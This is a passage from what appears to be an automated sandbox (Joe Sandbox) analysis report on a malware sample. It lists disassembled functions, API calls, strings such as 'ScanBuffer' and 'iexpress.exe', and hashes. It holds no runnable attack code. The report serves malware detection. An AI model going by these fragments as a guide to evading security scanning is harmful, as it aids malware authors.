                                                                • CloseHandle.KERNEL32(00000000,?,iexpress.exe,00000000,?,00000002,00000000,?,?,?,0289950E,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer), ref: 0289463B
                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,?,?,?,0289950E,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString), ref: 02894650
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$lstrcmpi
                                                                • String ID: iexpress.exe
                                                                • API String ID: 957822626-710937349
                                                                • Opcode ID: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction ID: 62d6276881e36d091b5d3f2f13b33fcd11dcc900316300e4c76e0b4ebb11a2db
                                                                • Opcode Fuzzy Hash: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction Fuzzy Hash: C2F089FE60032032EE2076794C89F9B758D8F457B8F0D0615B95DE7182FB25C45186A3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02881C9C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e07c80bfa7dae2dff50240efce94355d4610795b1654c0e6ed4b794203e5842d
                                                                • Instruction ID: 967f675e7e84b25f9656879e6f88b04bf2477ad658fd109633b80a0717f15159
                                                                • Opcode Fuzzy Hash: e07c80bfa7dae2dff50240efce94355d4610795b1654c0e6ed4b794203e5842d
                                                                • Instruction Fuzzy Hash: 3AA1E56F7106000BD718BA7C9C883ADB3C29B84325F28867EE11DCB785EFA4D9578751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02889730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0288981E), ref: 028897B6
                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0288981E), ref: 028897BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: DateFormatLocaleThread
                                                                • String ID: yyyy
                                                                • API String ID: 3303714858-3145165042
                                                                • Opcode ID: 7936beb98906e2d8b9bc9b42311c575031086764a1a01907ea214af4d636059b
                                                                • Instruction ID: f9c3c9498b2bf1ddfb2de6d646d8d55881b269c23a625e0fe90d7d2567e47e68
                                                                • Opcode Fuzzy Hash: 7936beb98906e2d8b9bc9b42311c575031086764a1a01907ea214af4d636059b
                                                                • Instruction Fuzzy Hash: B321603DA002199BDB10FF68C841AEEB3F9EF49710F4140A5E949E7350E7749E40CBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02883B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                • API String ID: 3535843008-4173385793
                                                                • Opcode ID: dd6ff1c475eedef4f242e34ad6d714a0aa4c06c5c8938612849fa738ebd7e8ce
                                                                • Instruction ID: e314269f62279805cd71d3556acb8b09b5bc9ab8a6e4499419bdd7e8733a97bf
                                                                • Opcode Fuzzy Hash: dd6ff1c475eedef4f242e34ad6d714a0aa4c06c5c8938612849fa738ebd7e8ce
                                                                • Instruction Fuzzy Hash: 580192BD940318BAFB11FB90CC42BA973E8D708B00F5004A1BA04D6680E6749A11DB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%